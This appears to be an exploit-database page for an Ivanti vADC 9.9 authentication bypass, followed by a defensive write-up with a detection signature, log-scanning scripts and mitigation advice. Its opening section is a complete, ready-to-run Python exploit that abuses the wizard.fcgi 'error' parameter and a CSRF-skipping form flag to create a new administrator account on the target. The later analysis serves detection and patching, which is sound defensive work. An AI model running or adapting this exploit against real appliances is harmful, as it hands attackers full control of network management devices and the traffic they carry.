Ivanti vADC 9.9 - Authentication Bypass

Exploit Author: ohnoisploited
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2024-08-04
# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stingray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC 
# Fixed versions: 22.7R2+

import requests

# Set to target address
admin_portal = 'https://192.168.88.130:9090'

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

requests.packages.urllib3.disable_warnings() 
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
          'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = {  '_form_submitted': 'form',
          'create_user': 'Create',
          'group': 'admin',
          'newusername': new_admin_name,
          'password1': new_admin_password,
          'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")


Ivanti vADC 9.9 — Authentication Bypass (high-level analysis, detection, and mitigation)

This article summarizes an authentication bypass vulnerability affecting Ivanti vADC (Virtual Application Delivery Controller) 9.9 (a product previously marketed as Riverbed/Brocade/Pulse). It explains the issue at a conceptual level, the potential impact, recommended mitigations and detection strategies, and safe testing advice for defenders. The goal is to provide actionable defensive guidance without enabling misuse.

Background

Ivanti vADC provides web-based management for traffic delivery and application services. Over time the product has been distributed under several names; the underlying management interface and CGI endpoints are the likely attack surface for remote management abuses. The vulnerability discussed here was disclosed in mid‑2024 and addressed by vendor updates.

Vulnerability overview (conceptual)

At a high level, the issue consisted of insufficient access control and request validation in a management CGI endpoint used by the product's web-based wizard. Crafted requests were able to bypass authentication and/or CSRF protections and trigger administrative actions (for example, creation of a new local administrator). The root causes are:

  • Unvalidated or insufficiently constrained query parameters that permitted the wizard code path to load privileged sections without verifying an authenticated session.
  • Form-submission handling that could be abused to perform configuration changes without a valid anti‑CSRF token or an authenticated user.

Impact and risk

  • Authentication bypass to a management interface can allow an attacker to create administrative users or change critical configuration, leading to full control of the appliance.
  • Impact is high where management interfaces are reachable from untrusted networks. Risk is lower when management ports are isolated behind VPNs, ACLs, or jump hosts.
  • Successful exploitation can be used for persistent access, lateral movement, or to disrupt traffic handling (DoS, data interception, manipulation).

Affected versions and fixes

Affected: Ivanti vADC 9.9 (and equivalent builds released under previous vendor names)
Fixed:    Vendor advisory indicates fixes in versions beginning with 22.7R2+ (verify exact build for your product family)

Always consult the official Ivanti security bulletin for precise build numbers and download links for patched firmware/images.

Detection and indicators of compromise (IOCs)

Defenders should search logs and telemetry for unusual accesses to management endpoints and for signs of new administrative user creation. Useful detection points include:

  • Requests to management CGI endpoints such as paths containing "wizard.fcgi" or other admin UI handlers originating from untrusted source IPs.
  • Query strings containing unexpected parameters that map to wizard state transitions or load privileged sections.
  • Audit events indicating creation of local admin accounts, sudden changes to authentication configuration, or successful logins from unfamiliar accounts.
  • Network connections to management ports (for example, 9090, 443, or custom admin ports) from external networks.

Example detection signatures (defensive only):

# Suricata/IDS signature (example) - detect HTTP requests to admin wizard endpoint
alert http any any -> any any (msg:"Possible Ivanti/vADC wizard access"; http.uri; content:"/wizard.fcgi"; nocase; classtype:attempted-admin; sid:1000001; rev:1;)

Explanation: This signature flags HTTP(S) requests whose URI contains "/wizard.fcgi". In environments where TLS is terminated at the device or inspection is available, this can raise events for further review.

# Simple log scan (Python) - look for suspicious wizard accesses in access logs
import re

# Match any request line that references the wizard endpoint, case-insensitively
pattern = re.compile(r"/wizard\.fcgi", re.IGNORECASE)

# Path to the web server access log exported from the appliance
with open("access.log", encoding="utf-8", errors="replace") as f:
    for line in f:
        if pattern.search(line):
            print(line.strip())  # flag the line for manual review

Explanation: This defensive snippet reads a web access log and prints any lines containing "wizard.fcgi". It is intended to help administrators spot unexpected accesses to this management endpoint in historical logs.
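The following is an added example, not part of the original advisory or the exploit author's code, that extends the simple log scan above into a small triage scorer: it parses combined-format access-log lines (constructed samples, not real device logs), keeps only wizard.fcgi requests, and weights the indicators listed earlier (source outside an assumed 10.0.0.0/8 management network, the 'error' query parameter, a privileged 'Access Management:' section, a POST, no authenticated user). The log format, the management subnet and the weights are assumptions.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, not real device logs); 10.0.0.0/8
# is the assumed trusted management network.
SAMPLE_LOG = """\
10.0.5.7 - admin [03/Aug/2024:10:01:12 +0000] "GET /apps/zxtm/index.fcgi HTTP/1.1" 200 5120
10.0.5.7 - admin [03/Aug/2024:10:02:40 +0000] "GET /apps/zxtm/wizard.fcgi?section=Wizards HTTP/1.1" 200 3071
198.51.100.23 - - [03/Aug/2024:11:15:02 +0000] "POST /apps/zxtm/wizard.fcgi?error=1&section=Access%20Management%3ALocalUsers HTTP/1.1" 200 812
198.51.100.23 - - [03/Aug/2024:11:15:09 +0000] "GET /apps/zxtm/login.fcgi HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
MGMT_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed admin subnet(s)
PRIVILEGED_PREFIX = "Access Management:"           # section family that edits local users

def score_line(line):
    """Score one access-log line; (0, []) means it is not a notable wizard.fcgi request."""
    m = LOG_RE.match(line)
    if not m:
        return 0, []
    url = urlsplit(m["target"])
    if not url.path.endswith("/wizard.fcgi"):
        return 0, []
    qs = parse_qs(url.query)               # decodes %20 and %3A inside 'section'
    src = ipaddress.ip_address(m["ip"])    # assumes the log records IPs, not hostnames
    checks = [  # (condition, weight, reason); weights are an assumed triage scale
        (not any(src in n for n in MGMT_NETS), 2, "source outside management network"),
        ("error" in qs, 3, "'error' parameter set on wizard.fcgi"),
        (any(s.startswith(PRIVILEGED_PREFIX) for s in qs.get("section", [])), 2,
         "privileged section requested: " + ",".join(qs.get("section", []))),
        (m["method"] == "POST", 1, "POST to wizard.fcgi"),
        (m["user"] == "-", 1, "no authenticated user recorded"),
    ]
    score = sum(w for hit, w, _ in checks if hit)
    return score, [r for hit, _, r in checks if hit]

def scan(log_text, threshold=3):
    """Return (ip, score, reasons) for each line scoring at or above the threshold."""
    hits = []
    for line in log_text.splitlines():
        score, reasons = score_line(line)
        if score >= threshold:
            hits.append((line.split()[0], score, reasons))
    return hits
```

Running `scan(SAMPLE_LOG)` reports only the external POST carrying `error=1` and the LocalUsers section; the administrator's ordinary wizard request from the management subnet scores 0.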

Mitigation and remediation

Immediate and long-term mitigations:

  • Patch: Apply vendor-supplied updates as soon as possible. Upgrading to the fixed release is the primary remedy.
  • Network restrictions: Restrict management interfaces to trusted administrative subnets, VPNs, or jump hosts. Implement ACLs on the device and at network perimeter.
  • Multi-factor authentication (MFA): Enable MFA for management logins if supported to reduce impact of credential exposure.
  • Disable unused services: If the web-based wizard is not required, disable or limit it. Reduce exposed attack surface.
  • WAF/IPS rules: Deploy application firewall rules to block suspicious query parameters or unexpected POST submissions to management endpoints.
  • Credential hygiene: Immediately rotate administrator passwords and API keys if compromise is suspected. Audit local user lists for unauthorized accounts.
  • Monitoring: Increase audit logging and monitor for new admin accounts, configuration changes, and anomalous authentication events.

Incident response checklist

  • Isolate the affected appliance from untrusted networks while preserving logs for analysis.
  • Collect system and web server logs, configuration snapshots, local user lists, and created accounts.
  • Search for persistence mechanisms (new admin users, SSH keys, scheduled tasks) and unusual outbound connections.
  • Restore from a known-good backup if configuration integrity cannot be verified, after applying vendor patches.
  • Report and coordinate with your vendor support and follow any vendor-specific incident response guidance.

Safe testing and responsible disclosure

Only test vulnerable appliances in controlled lab environments that you own or have explicit permission to assess. Do not probe or attempt exploitation on production systems or third-party networks. If you discover an active issue, follow Ivanti's responsible disclosure process and the guidance in their security advisories.

Hardening checklist (post-remediation)

Action                          Purpose
Apply vendor patches            Close known vulnerability
Restrict management access      Reduce exposure to attackers
Enable MFA                      Reduce risk from credential compromise
Harden logging and retention    Support detection and forensics
Periodic configuration audits   Detect unauthorized changes

Summary

The vADC 9.9 authentication bypass represents a high-risk flaw because it targets the management plane. Defenders should prioritize patching, isolate management interfaces, enforce strong access controls, and deploy monitoring rules to detect attempts to probe or manipulate the appliance's administrative endpoints. When in doubt, coordinate with Ivanti support and follow vendor advisories for exact remediation steps and fixed builds.